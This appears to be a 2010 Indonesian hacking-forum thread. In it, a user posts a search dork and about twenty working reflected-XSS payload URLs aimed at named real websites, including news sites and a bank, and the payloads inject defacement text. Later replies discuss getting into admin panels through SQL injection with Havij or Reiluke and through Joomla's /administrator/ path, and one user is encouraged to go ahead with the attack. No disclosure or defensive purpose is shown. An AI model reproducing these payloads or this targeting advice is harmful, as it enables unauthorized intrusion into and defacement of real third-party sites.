X-code Professional

X-code Community

Facebook group

Telegram group

Instagram X-code

Twitter X-code

X-code Blog

X-code Github

Panel
Welcome! Anonymous

Multiple Vulnerability (XSS+SQLi)

[ { NUM_COMMENT }]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Multiple Vulnerability (XSS+SQLi)

Postby Darkzzzz » Thu Jun 24, 2010 11:40 pm

:maaf: Kalo repost atau udah pernah :maaf:
Ane baru nemu beberapa jam yang lalu :tapa:

intitle:"Highdesert news"
vuln : http://website.xxx/displaynews.php?id=<sql + xss/html>

POC :
http://silverlakesmcf.com/displaynews.php?id=1%3E%3Cscript%3Ealert%28XCode%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EGreetz%20To%20:%20Poni,Wilmar%20Kidz,XShadow,Bi4kkob4r,Abah,Phycole,3xtr3m3b0y,etc%3C/h1%3E

http://theapplevalleynews.com/displaynews.php?id=5065%3E%3Cscript%3Ealert%28XCode%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EGreetz%20To%20:%20Poni,Wilmar%20Kidz,XShadow,Bi4kkob4r,Abah,Phycole,3xtr3m3b0y,etc%3C/h1%3E

http://thesilverlakesnews.com/displaynews.php?id=454%3E%3Cscript%3Ealert%28XCode%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EGreetz%20To%20:%20Poni,Wilmar%20Kidz,XShadow,Bi4kkob4r,Abah,Phycole,3xtr3m3b0y,etc%3C/h1%3E

http://thespringvalleynews.com/displaynews.php?id=417%3E%3Cscript%3Ealert%28XCode%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EGreetz%20To%20:%20Poni,Wilmar%20Kidz,XShadow,Bi4kkob4r,Abah,Phycole,3xtr3m3b0y,etc%3C/h1%3E

http://thespringvalleylakenews.com/displaynews.php?id=1%3E%3Cscript%3Ealert%28XCode%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EGreetz%20To%20:%20Poni,Wilmar%20Kidz,XShadow,Bi4kkob4r,Abah,Phycole,3xtr3m3b0y,etc%3C/h1%3E

http://thevictorvillenews.com/displaynews.php?id=1%3E%3Cscript%3Ealert%28XCode%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EGreetz%20To%20:%20Poni,Wilmar%20Kidz,XShadow,Bi4kkob4r,Abah,Phycole,3xtr3m3b0y,etc%3C/h1%3E
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: XSS + MySql Error

Postby Tool3 » Fri Jun 25, 2010 12:29 am

:kaca:

keren wkwkwkwk awas kena bugss.......
User avatar
Tool3
 
Posts: 99
Joined: Sun Feb 22, 2009 6:54 pm

Re: XSS + MySql Error

Postby Darkzzzz » Fri Jun 25, 2010 12:49 am

Nambah ah, mumpung ane belon ngantuxXx

http://www.connexions-bury.com/latest_news/displaynews.php?id=88%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.connexions-stockport.com/latest_news/displaynews.php?id=251%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.connexions-stockport.org.uk/latest_news/displaynews.php?id=265%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.darwincyclingclub.com/news/displaynews.php?id=1241142720%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.experis.com/displaynews.php?ID=12%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.iccj.or.jp/displaynews.php?id=621%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.innodelta.net/nrwnl/_system/print.handle.php?seite=/nrwnl/displaynews.php?id=25%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.nccbank.com.np/displaynews.php?id=22%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.show-canada.com/app/templates/displayNews.php?id=7%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://newsftp3.an.tv/s/?sid=5%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.mcflyofficial.com/news/index.php?id=1134%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.comingsoon.net/news/movienews.php?id=64648%27%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.asianewsnet.net/news.php?sec=2%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

http://www.selenetrawlers.com/news-id.php?id=179%3E%3Cscript%3Ealert%281337%29%3C/script%3E%3Ch1%3E%3Cmarquee%3EXSSed%20By%20:%20Darkzzzz%3C/marquee%3E%3Cbr%3EXCode%3C/h1%3E

Thanks to : Bang Poni atas tutorial Havijnya & Thanks to Wilmar Kidz atas Indosiarnya... :love:
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: Multiple Vulnerability (XSS+SQLi)

Postby RJ-45 » Sat Jun 26, 2010 6:42 am

terus lo mau masuk ke adminnya gmana kakak.......!
RJ-45
 
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: Multiple Vulnerability (XSS+SQLi)

Postby Darkzzzz » Sat Jun 26, 2010 10:23 am

Cari aja pake Havij atau nggak pake Reiluke, tutornya khan dah dijelaskan sama bang Poni...
Tapi kalo targetnya joomla sih nggak masalah, tinggal /administrator/ ;)
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: Multiple Vulnerability (XSS+SQLi)

Postby RJ-45 » Sat Jun 26, 2010 10:40 pm

lo gitu ijin lakuin SQLI kakak....................!
:devil :devil :devil :devil :licik: :licik: :licik: :licik: :licik: :licik:
RJ-45
 
Posts: 78
Joined: Thu Dec 17, 2009 2:29 pm

Re: Multiple Vulnerability (XSS+SQLi)

Postby Darkzzzz » Sun Jun 27, 2010 8:08 am

Dipersilahkan...
I'm not A Hacker, But I'm A Image
User avatar
Darkzzzz
 
Posts: 2206
Joined: Fri Jul 27, 2007 1:59 pm
Location: UG-HotZone Depok 4, UG-HotZone Klp2 4 & UG-HotZone WaterFall.

Re: Multiple Vulnerability (XSS+SQLi)

Postby andryh4ever » Tue Jun 29, 2010 9:32 am

Wew DJ XSS beraksi lagi.. :kaca:
Let's Join with us on http://www.borneocrew.org/

..::: Hanya Ing!n Menul!$ Apa Yang Ing!n Aku Tul!s :::..

[*] Visit me on http://pl4nkt0n767.blogspot.com [*]
[*] Visit me on http://spyc0dz.blogspot.com [*]
User avatar
andryh4ever
 
Posts: 181
Joined: Tue Dec 15, 2009 3:08 pm
Location: Kendawangan, Kab. Ketapang, Kalimantan Barat

Re: Multiple Vulnerability (XSS+SQLi)

Postby anharku » Tue Jun 29, 2010 9:49 am

wag master XSS nya beraksi :love:
User avatar
anharku
 
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: Multiple Vulnerability (XSS+SQLi)

Postby Nol Sembilan Tiga » Tue Jun 29, 2010 4:53 pm

ijin nimbrung juga.. :devil :love:
-==Hanya Ingin belajar dan belajar==-
User avatar
Nol Sembilan Tiga
 
Posts: 141
Joined: Wed Apr 07, 2010 1:19 pm
Location: MaNad0

{ FACEBOOK_COMMENT }

Next

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 13 guests